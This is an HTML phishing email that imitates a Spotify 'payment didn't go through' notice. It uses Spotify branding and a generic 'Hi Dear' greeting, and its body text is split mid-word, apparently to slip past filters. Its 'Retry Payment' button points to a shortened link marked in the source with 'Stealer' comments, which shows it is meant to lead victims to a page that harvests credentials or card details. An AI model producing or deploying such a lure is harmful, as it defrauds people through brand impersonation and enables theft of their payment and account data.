<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>Spotify Payment Notification</title>
<style>
/* Define Spotify colors */
:root {
--spotify-green: #1db954;
--spotify-black: #191414;
--spotify-white: #ffffff;
}
/* General styling */
body {
font-family: Arial, sans-serif;
background-color: var(--spotify-black);
color: var(--spotify-white);
margin: 0;
padding: 0;
}
/* Container styles */
.container {
max-width: 600px;
margin: 0 auto;
padding: 20px;
background-color: var(--spotify-black);
color: var(--spotify-white);
}
/* Header styles */
.header {
text-align: center;
padding: 20px 0;
}
/* Image styles */
.logo {
display: block;
margin: 0 auto;
}
/* Content styles */
.content {
padding: 20px;
background-color: var(--spotify-green);
border-radius: 10px;
text-align: center;
}
/* Button styles */
.button {
display: inline-block;
padding: 10px 20px;
background-color: var(--spotify-black);
color: var(--spotify-white);
text-decoration: none;
border-radius: 5px;
}
/* Footer styles */
.footer {
text-align: center;
padding-top: 20px;
}
</style>
</head>
<body>
<div class="container">
<!-- Header -->
<div class="header">
<img
class="logo"
src="https://upload.wikimedia.org/wikipedia/commons/thumb/2/26/Spotify_logo_with_text.svg/1024px-Spotify_logo_with_text.svg.png"
alt="Spotify Logo"
width="150"
/>
</div>
<!-- Content -->
<div class="content">
<h2>Your payment didn't go through</h2>
<p>Hi Dear,</p>
<p>
Heads up, there was a problem pr
ocessing your payment. No need
to
worry, things happe
n. It's easy to fix-- you'll be e
njoying Spotify
again
in no time.
</p> <!-- Stealer -->
<a class="button" href="https://urlz.fr/t3CR">Retry Payment</a>
<!-- Stealer -->
</div>
<!-- Footer -->
<div class="footer">
<p>
Need help? Contact
<a href="#">Spotify Support</a>
</p>
<p>© 2024 Spotify. All rights reserved.</p>
</div>
</div>
</body>
</html>